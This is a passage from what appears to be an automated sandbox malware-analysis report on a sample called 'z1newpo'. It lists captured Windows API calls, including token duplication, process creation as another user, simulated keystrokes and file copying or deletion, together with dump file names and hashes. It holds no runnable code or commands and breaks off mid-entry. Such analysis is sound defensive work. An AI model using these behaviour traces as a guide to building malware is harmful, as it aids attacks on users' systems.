                                                    • GetFileAttributesW.KERNELBASE(?), ref: 0426A90B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1246312059.000000000426A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0426A000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_426a000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                    • Instruction ID: 2cf436ab5a7eb5acfa90ce9bf009ae88ded55a8b212877cc6d44985b2413bb18
                                                    • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                    • Instruction Fuzzy Hash: AED0A731A2620CEBCB10CFF49C049DA73A8D705320F104755FD16D3380D531AE809754
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: __wfsopen
                                                    • String ID:
                                                    • API String ID: 197181222-0
                                                    • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                    • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                                    • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                    • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                                    APIs
                                                    • CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                    • Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
                                                    • Opcode Fuzzy Hash: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                    • Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50
                                                    APIs
                                                    • Sleep.KERNELBASE(000001F4), ref: 0426C301
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1246312059.000000000426A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0426A000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_426a000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID:
                                                    • API String ID: 3472027048-0
                                                    • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                    • Instruction ID: 908015f23009c2751d5eeb897610d7b0df669d3a590179ba016697fe45056e10
                                                    • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                    • Instruction Fuzzy Hash: 48E0BF7494010DEFDB10EFA8D5496DE7BB4EF04301F1005A1FD05D7681DB309E648A62
                                                    APIs
                                                    • Sleep.KERNELBASE(000001F4), ref: 0426C301
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1246312059.000000000426A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0426A000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_426a000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID:
                                                    • API String ID: 3472027048-0
                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                    • Instruction ID: eefa3541187b651820aada43d4517aeff75abbf72c3bc592f9b939e77cd00cd5
                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                    • Instruction Fuzzy Hash: 5DE0E67494010DDFDB00EFB8D54969E7FB4EF04301F100561FD01D2281D6309D608A62
                                                    APIs
                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                    • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                    • GetKeyState.USER32(00000011), ref: 0047C92D
                                                    • GetKeyState.USER32(00000009), ref: 0047C936
                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                    • GetKeyState.USER32(00000010), ref: 0047C953
                                                    • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                    • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                    • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                    • _wcsncpy.LIBCMT ref: 0047CA29
                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                    • SendMessageW.USER32 ref: 0047CA7F
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                    • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                    • ImageList_SetDragCursorImage.COMCTL32(00950AB8,00000000,00000000,00000000), ref: 0047CB9B
                                                    • ImageList_BeginDrag.COMCTL32(00950AB8,00000000,000000F8,000000F0), ref: 0047CBAC
                                                    • SetCapture.USER32(?), ref: 0047CBB6
                                                    • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                                    • ReleaseCapture.USER32 ref: 0047CC3A
                                                    • GetCursorPos.USER32(?), ref: 0047CC72
                                                    • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                    • SendMessageW.USER32 ref: 0047CD12
                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                    • SendMessageW.USER32 ref: 0047CD80
                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                    • GetCursorPos.USER32(?), ref: 0047CDC8
                                                    • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                    • GetParent.USER32(00000000), ref: 0047CDF7
                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                    • SendMessageW.USER32 ref: 0047CE93
                                                    • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,016A1C20,00000000,?,?,?,?), ref: 0047CF1C
                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                    • SendMessageW.USER32 ref: 0047CF6B
                                                    • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,016A1C20,00000000,?,?,?,?), ref: 0047CFE6
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                    • String ID: @GUI_DRAGID$F
                                                    • API String ID: 3100379633-4164748364
                                                    • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                    • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                    • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                    • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                    APIs
                                                    • GetForegroundWindow.USER32 ref: 00434420
                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                    • IsIconic.USER32(?), ref: 0043444F
                                                    • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                    • SetForegroundWindow.USER32(?), ref: 0043446A
                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                    • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                    • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                    • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                    • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                    • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                    • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                    • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                    • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                    • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                    • String ID: Shell_TrayWnd
                                                    • API String ID: 2889586943-2988720461
                                                    • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                    • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                    • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                    • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                    APIs
                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                    • CloseHandle.KERNEL32(?), ref: 004463A0
                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                    • GetProcessWindowStation.USER32 ref: 004463D1
                                                    • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                    • _wcslen.LIBCMT ref: 00446498
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • _wcsncpy.LIBCMT ref: 004464C0
                                                    • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                    • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                    • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                    • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                    • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                    • CloseDesktop.USER32(?), ref: 0044657A
                                                    • SetProcessWindowStation.USER32(?), ref: 00446588
                                                    • CloseHandle.KERNEL32(?), ref: 00446592
                                                    • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                    • String ID: $@OH$default$winsta0
                                                    • API String ID: 3324942560-3791954436
                                                    • Opcode ID: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                                    • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                    • Opcode Fuzzy Hash: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                                    • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                                    APIs
                                                      • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                      • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                                                      • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                                                      • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                                                      • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                    • _wcscat.LIBCMT ref: 0044BD94
                                                    • _wcscat.LIBCMT ref: 0044BDBD
                                                    • __wsplitpath.LIBCMT ref: 0044BDEA
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                                                    • _wcscpy.LIBCMT ref: 0044BE71
                                                    • _wcscat.LIBCMT ref: 0044BE83
                                                    • _wcscat.LIBCMT ref: 0044BE95
                                                    • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                                                    • DeleteFileW.KERNEL32(?), ref: 0044BED3
                                                    • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                                                    • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                                                    • DeleteFileW.KERNEL32(?), ref: 0044BF15
                                                    • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                                                    • FindClose.KERNEL32(00000000), ref: 0044BF33
                                                    • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                                                    • FindClose.KERNEL32(00000000), ref: 0044BF7C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                    • String ID: \*.*
                                                    • API String ID: 2188072990-1173974218
                                                    • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                    • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                                                    • Opcode Fuzzy Hash: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                    • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                    • FindClose.KERNEL32(00000000), ref: 00478924
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                    • __swprintf.LIBCMT ref: 004789D3
                                                    • __swprintf.LIBCMT ref: 00478A1D
                                                    • __swprintf.LIBCMT ref: 00478A4B
                                                    • __swprintf.LIBCMT ref: 00478A79
                                                      • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                      • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                    • __swprintf.LIBCMT ref: 00478AA7
                                                    • __swprintf.LIBCMT ref: 00478AD5
                                                    • __swprintf.LIBCMT ref: 00478B03
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                    • API String ID: 999945258-2428617273
                                                    • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                    • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                    • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                    • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                    APIs
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                    • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                    • __wsplitpath.LIBCMT ref: 00403492
                                                      • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                    • _wcscpy.LIBCMT ref: 004034A7
                                                    • _wcscat.LIBCMT ref: 004034BC
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                      • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                      • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                      • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                    • _wcscpy.LIBCMT ref: 004035A0
                                                    • _wcslen.LIBCMT ref: 00403623
                                                    • _wcslen.LIBCMT ref: 0040367D
                                                    Strings
                                                    • _, xrefs: 0040371C
                                                    • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                    • Error opening the file, xrefs: 00428231
                                                    • Unterminated string, xrefs: 00428348
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                    • API String ID: 3393021363-188983378
                                                    • Opcode ID: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                                                    • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                    • Opcode Fuzzy Hash: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                                                    • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                    • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                    • FindClose.KERNEL32(00000000), ref: 00431B20
                                                    • FindClose.KERNEL32(00000000), ref: 00431B34
                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                    • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                    • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                    • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                    • String ID: *.*
                                                    • API String ID: 1409584000-438819550
                                                    • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                    • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                    • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                    • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                    APIs
                                                    • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                    • __swprintf.LIBCMT ref: 00431C2E
                                                    • _wcslen.LIBCMT ref: 00431C3A
                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
